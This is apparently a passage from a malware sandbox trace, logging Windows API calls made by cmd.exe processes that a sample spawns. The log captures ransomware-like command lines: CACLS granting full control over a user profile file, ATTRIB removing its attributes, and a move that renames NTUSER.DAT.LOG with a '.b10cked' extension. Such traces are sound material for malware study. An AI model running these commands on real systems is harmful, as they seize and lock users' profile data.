lpProcessInformation=0x2ef1c0 | out: lpCommandLine="CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2ef1c0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbfc, dwThreadId=0xc20)) returned 1 [0215.777] CloseHandle (hObject=0x4c) returned 1 [0215.777] SetEnvironmentVariableW 
(lpName="COPYCMD", lpValue=0x0) returned 1 [0215.777] GetEnvironmentStringsW () returned 0x4f0198* [0215.777] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0215.777] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0216.005] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef0b4 | out: lpExitCode=0x2ef0b4*=0x0) returned 1 [0216.005] CloseHandle (hObject=0x50) returned 1 [0216.006] _vsnwprintf (in: _Buffer=0x2ef1fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0c0 | out: _Buffer="00000000") returned 8 [0216.006] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.006] GetEnvironmentStringsW () returned 0x4f20d8* [0216.006] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.006] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.006] GetEnvironmentStringsW () returned 0x4f20d8* [0216.006] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.006] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef118 | out: lpAttributeList=0x2ef118) [0216.006] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.007] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.007] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.007] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.007] FindClose (in: hFindFile=0x4ee3a8 | out: hFindFile=0x4ee3a8) returned 1 [0216.008] FindClose (in: hFindFile=0x4ee3a8 | out: hFindFile=0x4ee3a8) returned 1 [0216.008] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.008] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.008] 
GetConsoleTitleW (in: lpConsoleTitle=0x2ef290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.008] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef118, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef1e0 | out: lpAttributeList=0x2ef118, lpSize=0x2ef1e0) returned 1 [0216.008] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef118, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef1d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef118, lpPreviousValue=0x0) returned 1 [0216.008] GetStartupInfoW (in: lpStartupInfo=0x2ef0d4 | out: lpStartupInfo=0x2ef0d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0216.008] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.008] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef174*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1c0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", lpProcessInformation=0x2ef1c0*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc30, dwThreadId=0xb3c)) returned 1 [0216.010] CloseHandle (hObject=0x50) returned 1 
[0216.010] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.010] GetEnvironmentStringsW () returned 0x4f20d8* [0216.010] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.010] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0216.102] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef0b4 | out: lpExitCode=0x2ef0b4*=0x0) returned 1 [0216.102] CloseHandle (hObject=0x4c) returned 1 [0216.102] _vsnwprintf (in: _Buffer=0x2ef1fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0c0 | out: _Buffer="00000000") returned 8 [0216.102] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.102] GetEnvironmentStringsW () returned 0x4f20d8* [0216.102] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.102] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.102] GetEnvironmentStringsW () returned 0x4f20d8* [0216.102] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.102] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef118 | out: lpAttributeList=0x2ef118) [0216.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.102] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0216.103] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.103] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0216.103] SetConsoleInputExeNameW () returned 0x1 [0216.103] GetConsoleOutputCP () returned 0x1b5 [0216.103] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0216.103] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.103] exit (_Code=0) Process: id = "543" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16340" os_pid = "0xe08" os_integrity_level = "0x3000" os_privileges 
= "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31848 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31849 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31850 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31851 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 31852 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31853 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31854 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31855 
start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31856 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 31857 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32024 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32025 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 32026 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 32027 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32028 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32029 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32030 start_va = 0x76910000 
end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32031 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32032 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32033 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32034 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32035 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32036 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 32037 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32038 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32039 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" 
filename = "" Region: id = 32040 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 32041 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 32042 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 32043 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 32044 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 32045 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 32047 start_va = 0x2d0000 end_va = 0x38ffff entry_point = 0x2d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 742 os_tid = 0x600 [0215.750] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf84c | out: lpSystemTimeAsFileTime=0x1cf84c*(dwLowDateTime=0xb565c780, dwHighDateTime=0x1d440a9)) [0215.750] GetCurrentProcessId () returned 0xe08 [0215.750] GetCurrentThreadId () returned 0x600 [0215.750] GetTickCount () returned 0x3c60c [0215.750] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf844 | out: lpPerformanceCount=0x1cf844*=27253920020) returned 1 [0215.751] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.751] __set_app_type (_Type=0x1) [0215.751] __p__fmode () returned 0x76b331f4 [0215.751] __p__commode () returned 0x76b331fc [0215.751] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.751] __getmainargs (in: _Argc=0x4a9e4238, 
_Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.751] GetCurrentThreadId () returned 0x600 [0215.751] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x600) returned 0x38 [0215.751] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.751] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.752] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.752] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.752] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf7dc | out: phkResult=0x1cf7dc*=0x0) returned 0x2 [0215.752] VirtualQuery (in: lpAddress=0x1cf813, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.752] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.752] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.752] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.752] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0x1d0000, 
AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.752] GetConsoleOutputCP () returned 0x1b5 [0215.752] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.752] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.752] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.752] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.753] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.753] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.753] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.753] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.753] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.753] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.753] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.753] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.753] GetEnvironmentStringsW () returned 0x3d0140* [0215.754] FreeEnvironmentStringsW (penv=0x3d0140) returned 1 [0215.754] GetEnvironmentStringsW () returned 0x3d0140* [0215.754] FreeEnvironmentStringsW (penv=0x3d0140) returned 1 [0215.754] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce74c | out: phkResult=0x1ce74c*=0x40) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0xf0, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x1, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.754] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x1, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x0, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x40, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x40, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x40, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.754] RegCloseKey (hKey=0x40) returned 0x0 [0215.754] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce74c | out: phkResult=0x1ce74c*=0x40) returned 0x0 [0215.754] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x40, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x1, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x1, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x0, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x9, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x4, lpData=0x1ce758*=0x9, lpcbData=0x1ce750*=0x4) returned 0x0 [0215.755] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce754, lpData=0x1ce758, lpcbData=0x1ce750*=0x1000 | out: lpType=0x1ce754*=0x0, lpData=0x1ce758*=0x9, lpcbData=0x1ce750*=0x1000) returned 0x2 [0215.755] RegCloseKey (hKey=0x40) returned 0x0 [0215.755] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.755] srand (_Seed=0x5b8863b1) [0215.755] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"" [0215.755] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"" [0215.755] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.755] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.756] GetEnvironmentVariableW (in: lpName="PATH", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.756] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.756] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.756] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.756] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.756] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.756] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.756] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.756] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.756] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.756] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.756] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.756] GetEnvironmentStringsW () returned 0x3d2290* [0215.756] FreeEnvironmentStringsW (penv=0x3d2290) returned 1 [0215.756] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.756] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.756] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.756] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.756] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.756] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.756] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.756] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.757] _wcsicmp (_String1="KEYS", 
_String2="RANDOM") returned -7 [0215.757] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.757] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf518 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.757] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf518, lpFilePart=0x1cf514 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf514*="Desktop") returned 0x18 [0215.757] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.757] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf294 | out: lpFindFileData=0x1cf294) returned 0x3cffd0 [0215.757] FindClose (in: hFindFile=0x3cffd0 | out: hFindFile=0x3cffd0) returned 1 [0215.757] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf294 | out: lpFindFileData=0x1cf294) returned 0x3cffd0 [0215.757] FindClose (in: hFindFile=0x3cffd0 | out: hFindFile=0x3cffd0) returned 1 [0215.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf294 | out: lpFindFileData=0x1cf294) returned 0x3cffd0 [0215.758] FindClose (in: hFindFile=0x3cffd0 | out: hFindFile=0x3cffd0) returned 1 [0215.758] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.758] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.758] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.758] GetEnvironmentStringsW () returned 0x3d2ab0* [0215.758] FreeEnvironmentStringsW (penv=0x3d2ab0) returned 1 [0215.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 